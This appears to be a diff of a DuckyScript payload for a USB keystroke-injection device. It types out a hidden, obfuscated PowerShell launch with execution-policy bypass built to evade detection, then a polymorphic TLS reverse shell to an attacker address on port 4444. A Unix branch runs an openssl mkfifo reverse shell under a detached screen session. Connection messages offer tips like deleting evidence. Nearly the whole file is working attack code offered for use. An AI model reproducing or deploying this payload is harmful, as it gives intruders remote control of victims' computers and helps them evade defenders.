#CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell +EXTENSION Rolling_Powershell_Execution + REM VERSION 1.0 + REM Author: 0iphor13 + REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek + REM Requirements: PayloadStudio v.1.3 minimum + REM Starts Powershell in uncommon ways to avoid basic detection + REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection. + + REM CONFIGURATION: + REM Add ExecutionPolicy bypass + DEFINE #EXECUTIONPOLICY FALSE + DEFINE #DELAY 200 + + $_RANDOM_MIN = 1 + $_RANDOM_MAX = 16 + VAR $RANDOM_PS = $_RANDOM_INT + FUNCTION Rolling_Powershell_Execution() + IF ($RANDOM_PS == 1) THEN + STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" + ELSE IF ($RANDOM_PS == 2) THEN + STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 3) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" + ELSE IF ($RANDOM_PS == 4) THEN + STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" + ELSE IF ($RANDOM_PS == 5) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 6) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" + ELSE IF ($RANDOM_PS == 7) THEN + STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" + ELSE IF ($RANDOM_PS == 8) THEN + STRING powershell -NoPro -noninT -win h + ELSE IF ($RANDOM_PS == 9) THEN + STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" + ELSE IF ($RANDOM_PS == 2) THEN + STRING powershell.exe -NoP -nOni -W h + ELSE IF ($RANDOM_PS == 10) THEN + STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" + ELSE IF ($RANDOM_PS == 11) THEN + STRING powershell -nopr -noninT -W HiddEn + ELSE IF ($RANDOM_PS == 12) THEN + STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" + ELSE IF ($RANDOM_PS == 13) THEN + STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" + ELSE IF ($RANDOM_PS == 14) THEN + STRING powershell -noproF -noni -W Hi + ELSE IF ($RANDOM_PS == 15) THEN + STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" + ELSE ($RANDOM_PS == 16) THEN + STRING powershell.exe -noP -nOnI -windo H + END_IF + + IF_DEFINED_TRUE #EXECUTIONPOLICY + SPACE + IF (($RANDOM_PS % 2) == 0) THEN + STRING -ep ByPasS + ELSE IF (($RANDOM_PS % 5) == 0) THEN + STRING -exec bypass + ELSE IF (($RANDOM_PS % 7) == 0) THEN + STRING -exeC byPasS + ELSE IF (($RANDOM_PS % 10) == 0) THEN + STRING -exEcUtionPoL bYpaSs + ELSE IF (($RANDOM_PS % 12) == 0) THEN + STRING -exEcUtion bYPaSs + ELSE + STRING -eP BYPaSs + END_IF + END_IF_DEFINED + ENTER + DELAY #DELAY + END_FUNCTION + REM EXAMPLE USAGE AFTER EXTENSION + REM DELAY 2000 + REM GUI r + REM DELAY 2000 + REM Rolling_Powershell_Execution() +END_EXTENSION + +REM Define the attackers IP, Port and Identifier +DEFINE #ADDRESS '0.0.0.0' +DEFINE #PORT 4444 +DEFINE #IDENTIFIER Ducky +REM Automatic setup requires openssl! +DEFINE #SETUP FALSE + +REM Automatic setup and start listener - Requires openssl! +IF_DEFINED #SETUP + IF ($_OS == #NOT_WINDOWS) THEN + DELAY 1500 + STRINGLN echo "Setting up Infrastructre - Do not interact!" + DELAY 1000 + STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT + ELSE + DELAY 1500 + GUI r + DELAY 1000 + STRINGLN notepad.exe + DELAY 250 + STRING Setup requires an unix based machine with openssl installed! + END_IF +ELSE_DEFINED + IF ($_OS == WINDOWS) THEN + + REM Pseudo random variables for layer one polymorphism + VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE + VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE + VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE + VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE + VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE + VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE + VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE + VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE + + REM Layer two polymorphism + VAR $RANDOM_LAYER = $_RANDOM_INT + + REM Polymorphism function + FUNCTION Polymorphism() + IF (($RANDOM_LAYER % 2) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 6) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish4 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism2() + IF (($RANDOM_LAYER % 6) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 9) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibberish3 + INJECT_VAR $var_gibberish6 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism3() + IF (($RANDOM_LAYER % 1) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gIbberish5 + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING $ + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Polymorphism function + FUNCTION Polymorphism4() + IF (($RANDOM_LAYER % 1) == 0) THEN + STRING $ + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gibberish2 + INJECT_VAR $var_gibb3rish + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING $ + INJECT_VAR $var_gibBerish1 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + INJECT_VAR $var_gibberish + ELSE + STRING $ + INJECT_VAR $var_gibberish6 + INJECT_VAR $var_gibberish4 + INJECT_VAR $var_gibberish + INJECT_VAR $var_gIbberish5 + END_IF + END_FUNCTION + + REM Connection Message + FUNCTION Quack_Slogan() + IF (($RANDOM_LAYER % 2) == 0) THEN + STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n" + ELSE IF (($RANDOM_LAYER % 3) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n" + ELSE IF (($RANDOM_LAYER % 4) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n" + ELSE IF (($RANDOM_LAYER % 6) == 0) THEN + STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n" + ELSE IF (($RANDOM_LAYER % 8) == 0) THEN + STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n" + ELSE IF (($RANDOM_LAYER % 9) == 0) THEN + STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n" + ELSE + STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n" + END_IF + END_FUNCTION + + GUI r + DELAY 500 + Rolling_Powershell_Execution() + DELAY 300 + Polymorphism() + STRING =[Text.Encoding]::UTF8.GetBytes( + Quack_Slogan() + STRING ); + Polymorphism2() + REM Section were Address & Port get reflected + STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT ); + STRING $s= + Polymorphism2() + STRING .GetStream(); + STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); + STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false); + Polymorphism3() + STRING =new-object System.IO.StreamWriter($sSL); + STRING $sSL.write( + Polymorphism() + STRING ,0, + Polymorphism() + STRING .Length); + Polymorphism3() + STRING .Write(' + REM Identifier + STRING #IDENTIFIER + STRING @PS '+(&('g'+'l'))+'> '); + Polymorphism3() + STRING .flush();[byte[]] + Polymorphism4() + STRING = 0..65535|%{0};while(($i=$sSL.Read( + Polymorphism4() + STRING , 0, + Polymorphism4() + STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString( + Polymorphism4() + STRING ,0, $i); + STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + ' + REM Identifier + STRING #IDENTIFIER + STRING @PS ' + (Get-LoCatIon).Path + '> '; + STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length); + STRING $sSL.Flush()};exit + DELAY 250 + ENTER + REM Indicator of successful execution + CAPSLOCK + DELAY 20 + CAPSLOCK + ELSE + REM Executing reverse shell when inserted into non-windows box + REM Non-ideal solution for opening terminal (But should work for most unix distros) + DELAY 2000 + INJECT_MOD COMMAND + DELAY 2000 + STRING terminal + DELAY 500 + ENTER + DELAY 1000 + STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s' + DELAY 1000 + STRINGLN exit + END_IF +END_IF_DEFINED